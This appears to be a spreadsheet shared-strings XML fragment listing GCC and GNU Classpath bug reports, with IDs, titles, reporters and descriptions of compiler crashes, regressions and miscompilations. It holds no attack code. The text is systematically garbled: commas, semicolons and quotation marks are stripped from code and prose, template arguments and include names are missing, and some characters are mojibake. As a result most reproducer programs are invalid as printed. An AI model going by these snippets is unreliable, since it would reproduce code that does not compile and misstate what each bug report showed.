  res = myfunc(myinstance status) ! OK
  res = myinstance%myfunc()        ! FAILED
  res = myinstance%myfunc(status)  ! OK
end program
This currently produces the output:
 myfunc: status is not present.
 myfunc: status is present.
 myfunc: status is present.
 myfunc: status is present.
The correct output would be:
 myfunc: status is not present.
 myfunc: status is present.
 myfunc: status is not present.
 myfunc: status is present.
Apparently this only happens for type-bound character-valued functions (but not for subroutines or e.g. integer-valued functions).
-fdump-tree-original shows the following for the four calls to 'myfunc':
    myfunc ((character(kind=1)[1:80] *) 
    myfunc ((character(kind=1)[1:80] *) 
    myfunc ((character(kind=1)[1:80] *) 
    myfunc ((character(kind=1)[1:80] *) 
In the third case we fail to pass a null pointer for the missing optional arg.</t>
  </si>
  <si>
    <t>GCC-34657</t>
  </si>
  <si>
    <t>program-unit MY_SUB imports symbol MY_SUB</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95' but does not do so with
gcc version 4.3.0 20080103 (experimental) [trunk revision 131300] (GCC)
module test_mod
interface
  subroutine my_sub (a)
    real a
  end subroutine
end interface
end module
subroutine my_sub (a)
  use test_mod
  real a
  print * a
end subroutine
END</t>
  </si>
  <si>
    <t>GCC-1126</t>
  </si>
  <si>
    <t>gcjh needs to output space before leading :: with JArray's</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: paul@pajato.com
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/119: gcjh needs to output space before leading :: with JArray's
Date: Mon 13 Dec 1999 07:39:57 -0800 (PST)
 Hi thanks for the bug report.
 I can't reproduce this bug.  For me gcjh never prints JArray.
 My reading of the code is that the leading :: is never generated in
 the case where decode_signature_piece is processing an array.
 Can you send me a simple (standalone) Java source file that
 demonstrates the bug?  That would help a lot.  Otherwise I am going
 to close the PR.
 Tom
</t>
  </si>
  <si>
    <t>GCC-60508</t>
  </si>
  <si>
    <t>[4.8 Regression] internal compiler error: in lra_set_insn_recog_data at lra.c:1082</t>
  </si>
  <si>
    <t>Created attachment 32339
source code
At r208400 GCC is failing with internal compiler error on the attached source generated with csmith.
$ gcc -O -S z.c -w
z.c: In function â€˜fn1â€™:
z.c:33:1: internal compiler error: in lra_set_insn_recog_data at lra.c:1082
 }
 ^
0x8aa962 lra_set_insn_recog_data(rtx_def*)
        ../../gcc/lra.c:1080
0x8ab4cf lra_get_insn_recog_data
        ../../gcc/lra-int.h:464
0x8ab4cf lra_update_insn_regno_info
        ../../gcc/lra.c:1749
0x8ab4cf lra_update_insn_regno_info
        ../../gcc/lra.c:1740
0x8ab6b1 lra_push_insn_1
        ../../gcc/lra.c:1802
0x8ab6b1 lra_push_insn(rtx_def*)
        ../../gcc/lra.c:1810
0x8ab89c push_insns
        ../../gcc/lra.c:1853
0x8abc65 lra_process_new_insns(rtx_def* rtx_def* rtx_def* char const*)
        ../../gcc/lra.c:1898
0x8b9df6 curr_insn_transform
        ../../gcc/lra-constraints.c:3689
0x8bbb84 lra_constraints(bool)
        ../../gcc/lra-constraints.c:4157
0x8ac4d3 lra(_IO_FILE*)
        ../../gcc/lra.c:2340
0x86af0e do_reload
        ../../gcc/ira.c:5457
0x86af0e rest_of_handle_reload
        ../../gcc/ira.c:5598
0x86af0e execute
        ../../gcc/ira.c:5627</t>
  </si>
  <si>
    <t>GCC-27617</t>
  </si>
  <si>
    <t>no support for turning specific warnings into errors</t>
  </si>
  <si>
    <t>There is currently no support in gcc for turning specific warnings into errors.
I do most of my developement with gcc while my colleagues use MSVC which will error out on -Wcast-qual's equivalent. Using -Werror would be completely unpractical because our codebase is fairly large and spewing a LOT of warnings already. Yet there are several warnings ( like cast-qual ) that I would want to error out so I don't checkin code that will not compile on other platforms.
At this point the only option is to post process gcc's output which is obviously suboptimal.</t>
  </si>
  <si>
    <t>ttimo</t>
  </si>
  <si>
    <t>GCC-47841</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] New guality test failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 170359 gave
FAIL: gcc.dg/guality/sra-1.c  -O2 -flto  line 43 a.j == 14
FAIL: gcc.dg/guality/sra-1.c  -O2 -flto -flto-partition=none  line 43 a.j == 14
FAIL: gcc.dg/guality/vla-1.c  -O2 -flto  line 17 sizeof (a) == 6
FAIL: gcc.dg/guality/vla-1.c  -O2 -flto -flto-partition=none  line 17 sizeof (a) == 6
Revision 170354 is OK.</t>
  </si>
  <si>
    <t>GCC-25874</t>
  </si>
  <si>
    <t>[gomp]  ICE in calc_dfs_tree()</t>
  </si>
  <si>
    <t>Current g++ from the gomp branch ICEs on the attached test case but only
when -O and -fopenmp is specified:
~/data/planck/LevelS&gt;g++ -v -O -fopenmp -c bug.ii
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /scratch/gompcc/configure --quiet --prefix=/scratch/ugccgomp --enable-languages=c++fortran --with-gmp=/usr/local/appl/gmp-4.1.4 --enable-checking=release
Thread model: posix
gcc version 4.2.0-gomp-20050608-branch 20060119 (experimental) (merged 20060119)
 /scratch/ugccgomp/libexec/gcc/i686-pc-linux-gnu/4.2.0-gomp-20050608-branch/cc1plus -fpreprocessed bug.ii -quiet -dumpbase bug.ii -mtune=generic -auxbase bug -O -version -fopenmp -o /tmp/ccpzsCty.s
GNU C++ version 4.2.0-gomp-20050608-branch 20060119 (experimental) (merged 20060119) (i686-pc-linux-gnu)
        compiled by GNU C version 4.2.0-gomp-20050608-branch 20060119 (experimental) (merged 20060119).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: e3aef40c574c8b69824cf08633defc10
Healpix_cxx/alm_powspec_tools.cc: In function 'void rotate_alm(Alm &gt;&amp; double double double) [with T = double]':
Healpix_cxx/alm_powspec_tools.cc:396: internal compiler error: in calc_dfs_tree at dominance.c:373
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This problem did not exist a few days ago.
Sorry for the long test case I hope I can reduce it over the weekend.</t>
  </si>
  <si>
    <t>CLASSPATH-27956</t>
  </si>
  <si>
    <t>JSlider getPreferredSize too small when labels enabled</t>
  </si>
  <si>
    <t>Another minor Swing nitpick.
Run the free swing demo and select the Slider demo. This looks pretty good overall but the thumbs of all sliders with labels enabled are clipped. 
Enlarging the internal window fixes the appearance which might indicate an
off-by-one error in getPreferredSize/getMinimumSize.
This happens both with the default (Metal/Ocean) and the GNU plaf. 
I would also prefer a one pixel spacing between the ticks and the labels for vertical sliders.</t>
  </si>
  <si>
    <t>GCC-51654</t>
  </si>
  <si>
    <t>C++ preprocessor bug with -maltivec and typedefs involving 'vector'</t>
  </si>
  <si>
    <t>The following C++ code
template
struct test
{
    typedef T::vector vector
}
when preprocessed using the following command
g++ -maltivec -E test.cpp
generates the following output:
template
struct test
{
    typedef T::vector
}
Expected output should be the file unchanged.
In particular this prevents from using significant parts of the Boost C++ libraries with AltiVec enabled.
I'm not sure which is the best place to affect this bug (c++ preprocessor target) feel free to move it.
Affecting to target because it seems similar to bug #39558.</t>
  </si>
  <si>
    <t>GCC-70096</t>
  </si>
  <si>
    <t>[6 Regression] [Invalid codegen] Read of uninitialized value in ref-qualified pointer to member function</t>
  </si>
  <si>
    <t>The following code has a codegen issue that causes the read of an uninitialized 
value which can lead to a segfault in some circumstances:
    struct Holder {
        void operator()()  }
        int data
    }
    template 
    void test() {
        Holder h{42}
        F Holder::* fptr = 
        (h.*fptr)()
    }
    int main() {
        test()
    }
&gt; g++ -std=c++11 test/worksheet.cpp
&gt; valgrind --leak-check=full --track-origins=yes ./a.out
    ==44102== Memcheck a memory error detector
    [...]
    ==44102== Use of uninitialised value of size 8
    ==44102==    at 0x100000EE6: Holder::operator()() &amp; (in ./a.out)
    ==44102==    by 0x100000F26: void test() (in ./a.out)
    ==44102==    by 0x100000ED2: main (in ./a.out)
    ==44102==  Uninitialised value was created by a stack allocation
    ==44102==    at 0x100000F2A: void test() (in ./a.out)
I'm not sure but I think it has something to do with the fact that we're 
using `F = void() &amp;` (note the ref-qualifier) and the reading of the `this`
pointer. I'm not sure at all but just pointing out a possible direction.
Live example: http://melpon.org/wandbox/permlink/kzRh8PNguwrP11lB</t>
  </si>
  <si>
    <t>ldionne.2</t>
  </si>
  <si>
    <t>GCC-2811</t>
  </si>
  <si>
    <t>mult.inheritance+overload+contravariance=SEGV</t>
  </si>
  <si>
    <t>When assigning to a pointer-to-member-function if the class of the lvalue is
a subclass of the class of the rvalue (taking advantage of the contravariance
of function pointers) and it is not the _first_ subclass (meaning the rvalue
must be multiply-inherited) the compiler must record within the pointer's
value an offset which is to be added to a pointer to the subclass to convert
it into a pointer to the superclass suitable for use by the function being
called.
When an expression of the form &amp;Foo::bar is assigned to a
pointer-to-member-function and Foo::bar is overloaded the compiler must
choose one of the Foo::bar candidates based on the argument types of the
lvalue.
It is possible for both of these conditions to exist in the same assignment
and in such a case g++ 2.95.x incorrectly records the subclass-to-superclass
offset as 0 resulting in a bad this pointer being passed when a call is
made through the function pointer.
I'm supplying a sample program which demonstrates this problem with the
contravariant assignment of a pointer to an overloaded member function of a
multiply inherited class.
It compiles clean under -Wall and segfaults reliably since I have managed
to put a null pointer in the location g++ is incorrectly dereferencing.
I ran this through CodeSourcery's Online Test Compilation and it seems the
3.0 snapshot there does not have the bug. It also seems that 3.0 uses a
completely different format for pointers to member functions so it's not
surprising that it doesn't have the bug.
Is it just me or does contravariant assignment of a pointer to an overloaded
member function of a multiply inherited class sound like a really good title
for a movie?
Release:
gcc version 2.95.2 20000220 (Debian GNU/Linux)
Environment:
Debian 2.2 i686
How-To-Repeat:
int ten=10
int otherten=10
class Super {
  public:
  int *dat
  Super::Super(int *arg) { this-&gt;dat=arg }
  int x(int *i) { return *i - *this-&gt;dat }
  int x(void) { return 0 }
}
class Monkey {
  public:
  int *wrench
  Monkey::Monkey() { wrench=(int *)0 }
}
class Sub : public Monkey public Super {
  public:
  Sub::Sub() : Super(&amp;ten) {}
}
int (Sub::*p)(int *)
int (Super::*fp)(int *)
int main(void)
{
  Sub v
#if 0
  fp= // resolve overloaded name - works fine
  p=fp         // resolve contravariance - works fine
#else
  p=  // attempt to resolve overloaded name and contravariance in
                // the same assignment - breaks
#endif
  return (v.*p)(
}</t>
  </si>
  <si>
    <t>pacman</t>
  </si>
  <si>
    <t>GCC-57142</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] SIZE/SHAPE overflow despite kind=8</t>
  </si>
  <si>
    <t>The following program should print:
  1 k=8 / 4294967300 k=8
  1 k=8 / 2147483650 k=8
However it prints:
  1 k=8 / 4 k=8
  1 k=8 / -2147483646 k=8
Expected:
* kind=8 is properly handled
* With kind=4 a warning/error is printed that the value exceeds huge(1_4)
NOTE: shape has the same issue ubound/lbound are okay (in both regards). The run-time version is fine.
!integer :: A(huge(1)+2_8) B(23)
integer :: A(1) B(huge(1)+3_82_8)
print '(4(i0a))' size(Akind=8)' k=' kind(size(Akind=8))' / ' &amp;
                   size(Bkind=8)' k=' kind(size(Bkind=8))
print '(4(i0a))' size(Adim=1kind=8)' k=' kind(size(Adim=1kind=8)) &amp;
      ' / '       size(Bdim=1kind=8)' k=' kind(size(Bdim=1kind=8))
end</t>
  </si>
  <si>
    <t>GCC-52456</t>
  </si>
  <si>
    <t>FAIL: libstdc++-abi/abi_check</t>
  </si>
  <si>
    <t>=== libstdc++-v3 check-abi Summary ===
# of added symbols:              325
# of missing symbols:            0
# of undesignated symbols:       2
# of incompatible symbols:       302
using: baseline_symbols.txt
FAIL: libstdc++-abi/abi_check
dave@mx3210:~/gnu/gcc/objdir/gcc$ ./xgcc -B./ -v 
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa-linux-gnu
Configured with: ../gcc/configure --with-arch=2.0 --with-gnu-as --with-gnu-ld --enable-shared --enable-multiarch --with-multiarch-defaults=hppa-linux-gnu --enable-linker-build-id --build=hppa-linux-gnu --host=hppa-linux-gnu --target=hppa-linux-gnu --prefix=/home/dave/opt/gnu/gcc/gcc-4.7.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux-gnu --enable-clocale=gnu --enable-java-gc=boehm --without-cloog --without-ppl --enable-languages=cc++objcfortranobj-c++javaadalto
Thread model: posix
gcc version 4.7.0 20120301 (experimental) [trunk revision 184680] (GCC)</t>
  </si>
  <si>
    <t>GCC-39163</t>
  </si>
  <si>
    <t>-mstackalign breaks -O2 optimization using g++</t>
  </si>
  <si>
    <t>This is basically a copy of bug report from http://www.dribin.org/dave/blog/archives/2006/12/05/missing_third_param/
Using the following sample file saved as test.c:
----------------------------------------------------------------------------
#include 
#define NOINLINE __attribute__((noinline))
NOINLINE static void foo1(int i1)
{
    printf(foo1: %d\n i1)
}
NOINLINE static void foo2(int i1 int i2)
{
    printf(foo2: %d %d\n i1 i2)
}
NOINLINE static void foo3(int i1 int i2 int i3)
{
    printf(foo3: %d %d %d\n i1 i2 i3)
}
NOINLINE static void foo4(int i1 int i2 int i3 int i4)
{
    printf(foo4: %d %d %d %d\n i1 i2 i3 i4)
}
NOINLINE static void foo5(int i1 int i2 int i3 int i4 int i5)
{
    printf(foo5: %d %d %d %d %d\n i1 i2 i3 i4 i5)
}
NOINLINE static void foo6(int i1 int i2 int i3 int i4 int i5 int i6)
{
    printf(foo6: %d %d %d %d %d %d\n i1 i2 i3 i4 i5 i6)
}
int main(int argc char **argv)
{
    foo1(1)
    foo2(1 2)
    foo3(1 2 3)
    foo4(1 2 3 4)
    foo5(1 2 3 4 5)
    foo6(1 2 3 4 5 6)
    return 0
}
----------------------------------------------------------------------------
produces invalid output (broken 3rd parameter) if compiled using g++ and -mstackrealign:
&gt; /usr/toolchains/gcc433/bin/g++ -Wall -mstackrealign -O2 test.c
&gt; ./a.out
foo1: 1
foo2: 1 2
foo3: 1 2 -1209632279
foo4: 1 2 4 134520820
foo5: 1 2 4 5 -1074446840
foo6: 1 2 4 5 6 134514537
However if gcc is used instead of g++ valid output is generated:
&gt; /usr/toolchains/gcc433/bin/gcc -mstackrealign -Wall -O2 test.c
&gt; ./a.out
foo1: 1
foo2: 1 2
foo3: 1 2 3
foo4: 1 2 3 4
foo5: 1 2 3 4 5
foo6: 1 2 3 4 5 6
Analyze of assembly dump revealed that GCC still uses ECX in main() to pass the parameter. ix86_internal_arg_pointer() in i386.c works fine and returns same values for gcc and g++ so the problem is not there.</t>
  </si>
  <si>
    <t>gyunaev</t>
  </si>
  <si>
    <t>GCC-83373</t>
  </si>
  <si>
    <t>False positive reported by -Wstringop-overflow</t>
  </si>
  <si>
    <t>When code below is compiled gcc incorrectly complains that memcpy will read data after end of buffer in line marked with star. Looks that gcc does not take into account that 'if' above protects against this.
Code was compiles using gcc (GCC) 8.0.0 20171210 (experimental).
[code]
#include 
char buf[100]
void get_data(char* ptr)
__attribute((nonnull(1 2)))
inline char* my_strcpy(char* __restrict__ dst const char* __restrict__ src size_t size)
{
    size_t len = strlen(src)
    if (len &lt; size)
        memcpy(dst src len + 1)
    else
    {
        memcpy(dst src size - 1) //*
        dst[size - 1] = '\0'
    }
    return dst
}
void test()
{
    char data[20]
    get_data(data)
    my_strcpy(buf data sizeof(buf))
}
[/code]
[out]
$ g++ -c -o test.o test.cc -O2 -Wall
In function â€˜char* my_strcpy(char* const char* size_t)â€™
    inlined from â€˜void test()â€™ at test.cc:25:14:
test.cc:15:15: warning: â€˜void* memcpy(void* const void* size_t)â€™ reading 99 bytes from a region of size 20 [-Wstringop-overflow=]
         memcpy(dst src size - 1) //*
         ~~~~~~^~~~~~~~~~~~~~~~~~~~
[/out]</t>
  </si>
  <si>
    <t>GCC-43378</t>
  </si>
  <si>
    <t>IVOPTs messes up code</t>
  </si>
  <si>
    <t>void bar(int int int)
void foo(int left int rite int element)
{
  while (left &lt;= rite)
    {
      rite -= element
      bar(left rite element)
      left += element
    }
}
produces:
foo (int left int rite int element)
{
  unsigned int D.2741
  unsigned int D.2742
  unsigned int D.2743
  unsigned int D.2737
  int D.2738
  unsigned int D.2739
  unsigned int D.2740
:
  if (left_3(D) &lt;= rite_4(D))
    goto 
  else
    goto 
:
:
  # left_14 = PHI 
  # rite_15 = PHI 
  D.2737_8 = (unsigned int) rite_15
  D.2738_2 = -element_5(D)
  D.2739_1 = (unsigned int) D.2738_2
  D.2740_13 = D.2737_8 + D.2739_1
  rite_12 = (int) D.2740_13
  rite_6 = rite_12
  bar (left_14 rite_6 element_5(D))
  D.2741_11 = (unsigned int) left_14
  D.2742_17 = (unsigned int) element_5(D)
  D.2743_18 = D.2741_11 + D.2742_17
  left_19 = (int) D.2743_18
  left_7 = left_19
  if (rite_6 &gt;= left_7)
    goto 
  else
    goto 
:
  goto 
from
foo (int left int rite int element)
{
:
  if (left_3(D) &lt;= rite_4(D))
    goto 
  else
    goto 
:
:
  # left_14 = PHI 
  # rite_15 = PHI 
  rite_6 = rite_15 - element_5(D)
  bar (left_14 rite_6 element_5(D))
  left_7 = left_14 + element_5(D)
  if (rite_6 &gt;= left_7)
    goto 
  else
    goto 
:
  goto 
as you can see it doesn't even create new induction variables.</t>
  </si>
  <si>
    <t>GCC-32442</t>
  </si>
  <si>
    <t>Ada 05 Null Exclusion Problem</t>
  </si>
  <si>
    <t>$ /home/tiberius/local/gcc/bin/gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.2.0/configure --prefix=/home/tiberius/local/gcc-4.2.0 --libexecdir=/home/tiberius/local/gcc-4.2.0/lib --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-languages=cc++ada
Thread model: posix
gcc version 4.2.0
$ /home/tiberius/local/gcc/bin/gnatmake -gnatf -gnat05 -fstack-check -gnato bla
gcc -c -gnatf -gnat05 -fstack-check -gnato bla.adb
+===========================GNAT BUG DETECTED==============================+
| 4.2.0 (i686-pc-linux-gnu) Assert_Failure checks.adb:2615                 |
| Error detected at bla.adb:21:10                                          |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases 
so please double check that the problem can still 
be reproduced with the set of files listed.
bla.adb
compilation abandoned
gnatmake: bla.adb compilation error
$ cat bla.adb 
with Ada.Text_IO
procedure bla
is
   procedure Default
   is
   begin
      Ada.Text_IO.Put_Line (xx)
   end Default
   type V is (abc def ghi jkl)
   type W is array (V) of not null access procedure
   X : constant W := (others =&gt; Default'Access)
--  Commenting this out doesn't cause the problem
   type Y is
      record
         Z : W := X
      end record
begin
   null
end bla</t>
  </si>
  <si>
    <t>tiberius1</t>
  </si>
  <si>
    <t>GCC-69141</t>
  </si>
  <si>
    <t>[6 Regression] -O2 -fdump-tree-fre ICEs</t>
  </si>
  <si>
    <t>While looking into PR66223 I found this.
Take this small undefined C++ code:
struct B {
  B* self
  B()
  virtual void f() = 0
}
B::B() : self( this ) { self-&gt;f() }
With -O2 -fdump-tree-fre we get the following ICE:
tt99.cc: In constructor â€˜B::B()â€™:
tt99.cc:6:36: internal compiler error: Segmentation fault
 B::B() : self( this ) { self-&gt;f() }
                                    ^
0xcd2fc7 crash_signal
        /home/apinski/src/local/gcc/gcc/toplev.c:334
0x90aef8 symtab_node::name() const
        /home/apinski/src/local/gcc/gcc/symtab.c:516
0xe6658b eliminate_dom_walker::before_dom_children(basic_block_def*)
        /home/apinski/src/local/gcc/gcc/tree-ssa-pre.c:4328
0x11c8b6b dom_walker::walk(basic_block_def*)
        /home/apinski/src/local/gcc/gcc/domwalk.c:265
0xe64563 eliminate
        /home/apinski/src/local/gcc/gcc/tree-ssa-pre.c:4464
0xe648af execute
        /home/apinski/src/local/gcc/gcc/tree-ssa-pre.c:4900
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-55258</t>
  </si>
  <si>
    <t>SSE register isn't used for 16byte copy</t>
  </si>
  <si>
    <t>[hjl@gnu-tools-1 pr55247]$ cat x.i 
typedef unsigned int uint32_t
typedef uint32_t Elf32_Word
typedef uint32_t Elf32_Addr
typedef struct {
  Elf32_Word st_name
  Elf32_Addr st_value
  Elf32_Word st_size
  unsigned char st_other
} Elf32_Sym
typedef struct {
  Elf32_Word r_info
}
Elf32_Rela
typedef struct {
  union {
    Elf32_Addr d_ptr
  }
  d_un
} Elf32_Dyn
struct link_map   {
  Elf32_Dyn *l_info[34]
}
extern void symbind32 (Elf32_Sym *)
void
_dl_profile_fixup (struct link_map *l Elf32_Word reloc_arg)
{
  const Elf32_Sym *const symtab  = (const void *) l-&gt;l_info[6]-&gt;d_un.d_ptr
  const Elf32_Rela *const reloc  = (const void *) (l-&gt;l_info[23]-&gt;d_un.d_ptr + reloc_arg * sizeof (Elf32_Rela))
  Elf32_Sym sym = symtab[(reloc-&gt;r_info) &gt;&gt; 8]
  symbind32 (
}
[hjl@gnu-tools-1 pr55247]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ -O -Wall -mx32 -maddress-mode=short  -S x.i -o short.asm
[hjl@gnu-tools-1 pr55247]$ cat short.asm 
	.file	x.i
	.text
	.globl	_dl_profile_fixup
	.type	_dl_profile_fixup @function
_dl_profile_fixup:
.LFB0:
	.cfi_startproc
	subl	$24 %esp
	.cfi_def_cfa_offset 32
	movl	24(%edi) %edx
	movl	92(%edi) %eax
	movl	(%eax) %eax
	movl	(%eax%esi4) %eax
	shrl	$8 %eax
	sall	$4 %eax
	addl	(%edx) %eax
	movq	8(%eax) %rdx
	movq	(%eax) %rax
	movq	%rax (%esp)
	movq	%rdx 8(%esp)
	movl	%esp %edi
	call	symbind32
	addl	$24 %esp
	.cfi_def_cfa_offset 8
	ret
	.cfi_endproc
.LFE0:
	.size	_dl_profile_fixup .-_dl_profile_fixup
	.ident	GCC: (GNU) 4.8.0 20121110 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-tools-1 pr55247]$ /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ -O -Wall -mx32 -maddress-mode=long  -S x.i -o long.asm
[hjl@gnu-tools-1 pr55247]$ cat long.asm 
	.file	x.i
	.text
	.globl	_dl_profile_fixup
	.type	_dl_profile_fixup @function
_dl_profile_fixup:
.LFB0:
	.cfi_startproc
	subq	$40 %rsp
	.cfi_def_cfa_offset 48
	movl	24(%rdi) %edx
	movl	92(%rdi) %eax
	movl	(%rax) %eax
	movl	(%eax%esi4) %eax
	shrl	$8 %eax
	sall	$4 %eax
	addl	(%rdx) %eax
	movdqu	(%eax) %xmm0
	movdqa	%xmm0 (%rsp)
	movq	(%rsp) %rax
	movq	8(%rsp) %rdx
	movq	%rax 16(%rsp)
	movq	%rdx 24(%rsp)
	leaq	16(%rsp) %rdi
	call	symbind32
	addq	$40 %rsp
	.cfi_def_cfa_offset 8
	ret
	.cfi_endproc
.LFE0:
	.size	_dl_profile_fixup .-_dl_profile_fixup
	.ident	GCC: (GNU) 4.8.0 20121110 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-tools-1 pr55247]$ 
For TARGET_SSE_UNALIGNED_LOAD_OPTIMAL/TARGET_SSE_UNALIGNED_STORE_OPTIMAL
we should always generate
	movdqu	(%eax) %xmm0
	movdqa	%xmm0 (%rsp)</t>
  </si>
  <si>
    <t>GCC-54027</t>
  </si>
  <si>
    <t>[4.8 Regression] possible mis-optimization of signed left shift in c89 mode</t>
  </si>
  <si>
    <t>The program below is clearly undefined in C99 but I'm not sure that it should be undefined in C89 mode.
GCC pre-4.8.0 turns the code into an infinite loop even in C89 mode at -O2 and higher.
regehr@home:~/svn/code$ cat shift.c
int main (void)
{
  int x = 1
  while (x)
    x &lt;&lt;= 1
  return x
}
regehr@home:~/svn/code$ gcc -O2 -std=c89 shift.c  ./a.out 
^C
regehr@home:~/svn/code$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r189449-install/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r189449-install --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20120713 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-51722</t>
  </si>
  <si>
    <t>[4.7 Regression] Options -g3 or -ggdb3 or -g3 -gdwarf-2 and other -g..level3 - internal compiler error</t>
  </si>
  <si>
    <t>cd src/ &amp;&amp; /usr/bin/qmake /data/yura/eclipse1/workspace/gxbook-src-0.0.1/src/src.pro CONFIG+=debug QMAKE_CC=gcc-4.7 QMAKE_CXX=g++-4.7 QMAKE_LINK=g++-4.7 QMAKE_CFLAGS_DEBUG=-g3\ -gdwarf-4\ -fvar-tracking-assignments QMAKE_CXXFLAGS_DEBUG=-g3\ -gdwarf-4\ -fvar-tracking-assignments -o Makefile
cd src/ &amp;&amp; /usr/bin/gmake -f Makefile 
gmake[1]: Entering directory `/data/yura/eclipse1/workspace/gxbook-src-0.0.1/build/debug/src'
g++-4.7 -m64 -pipe -std=c++0x -g3 -gdwarf-4 -fvar-tracking-assignments -D_REENTRANT -Wall -W -DQT_GUI_LIB -DQT_CORE_LIB -DQT_SHARED -I/usr/share/qt4/mkspecs/default -I../../../src -I/usr/include/QtCore -I/usr/include/QtGui -I/usr/include -I. -I../../../src -I. -x c++-header -c ../../../src/headers.h -o gxbook.gch/c++
g++-4.7 -c -include gxbook -m64 -pipe -std=c++0x -g3 -gdwarf-4 -fvar-tracking-assignments -D_REENTRANT -Wall -W -DQT_GUI_LIB -DQT_CORE_LIB -DQT_SHARED -I/usr/share/qt4/mkspecs/default -I../../../src -I/usr/include/QtCore -I/usr/include/QtGui -I/usr/include -I. -I../../../src -I. -o main.o ../../../src/main.cpp
*** glibc detected *** /usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus: free(): invalid pointer: 0x000000100004e420 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x74c06)[0x7f1af7d75c06]
/usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus[0x5effd4]
/usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus[0x79a977]
/lib64/libc.so.6(__libc_start_main+0xed)[0x7f1af7d2223d]
/usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus[0x41a051]
======= Memory map: ========
00400000-00fd8000 r-xp 00000000 08:02 103794313 /usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus
011d7000-011d8000 r--p 00bd7000 08:02 103794313 /usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus
011d8000-011e3000 rw-p 00bd8000 08:02 103794313 /usr/local/lib/gcc/x86_64-suse-linux/4.7.0/cc1plus
011e3000-014b6000 rw-p 00000000 00:00 0                                  [heap]
1000000000-1002bf5000 rw-p 00085000 08:11 572044 /data/yura/eclipse1/workspace/gxbook-src-0.0.1/build/debug/src/gxbook.gch/c++
7f1af6be1000-7f1af77e1000 rw-p 00000000 00:00 0 
7f1af77e1000-7f1af77f6000 r-xp 00000000 08:02 37392436 /lib64/libgcc_s.so.1
7f1af77f6000-7f1af79f5000 ---p 00015000 08:02 37392436 /lib64/libgcc_s.so.1
7f1af79f5000-7f1af79f6000 r--p 00014000 08:02 37392436 /lib64/libgcc_s.so.1
7f1af79f6000-7f1af79f7000 rw-p 00015000 08:02 37392436 /lib64/libgcc_s.so.1
7f1af79f7000-7f1af7ae3000 r-xp 00000000 08:02 181198   /usr/lib64/libstdc++.so.6.0.16
7f1af7ae3000-7f1af7ce2000 ---p 000ec000 08:02 181198   /usr/lib64/libstdc++.so.6.0.16
7f1af7ce2000-7f1af7cea000 r--p 000eb000 08:02 181198   /usr/lib64/libstdc++.so.6.0.16
7f1af7cea000-7f1af7cec000 rw-p 000f3000 08:02 181198   /usr/lib64/libstdc++.so.6.0.16
7f1af7cec000-7f1af7d01000 rw-p 00000000 00:00 0 
7f1af7d01000-7f1af7e86000 r-xp 00000000 08:02 33554966 /lib64/libc-2.14.1.so
7f1af7e86000-7f1af8086000 ---p 00185000 08:02 33554966 /lib64/libc-2.14.1.so
7f1af8086000-7f1af808a000 r--p 00185000 08:02 33554966 /lib64/libc-2.14.1.so
7f1af808a000-7f1af808b000 rw-p 00189000 08:02 33554966 /lib64/libc-2.14.1.so
7f1af808b000-7f1af8090000 rw-p 00000000 00:00 0 
7f1af8090000-7f1af80e6000 r-xp 00000000 08:02 33554935 /lib64/libm-2.14.1.so
7f1af80e6000-7f1af82e5000 ---p 00056000 08:02 33554935 /lib64/libm-2.14.1.so
7f1af82e5000-7f1af82e6000 r--p 00055000 08:02 33554935 /lib64/libm-2.14.1.so
7f1af82e6000-7f1af82e7000 rw-p 00056000 08:02 33554935 /lib64/libm-2.14.1.so
7f1af82e7000-7f1af835b000 r-xp 00000000 08:02 181227   /usr/lib64/libgmp.so.10.0.2
7f1af835b000-7f1af855a000 ---p 00074000 08:02 181227   /usr/lib64/libgmp.so.10.0.2
7f1af855a000-7f1af855b000 r--p 00073000 08:02 181227   /usr/lib64/libgmp.so.10.0.2
7f1af855b000-7f1af8564000 rw-p 00074000 08:02 181227   /usr/lib64/libgmp.so.10.0.2
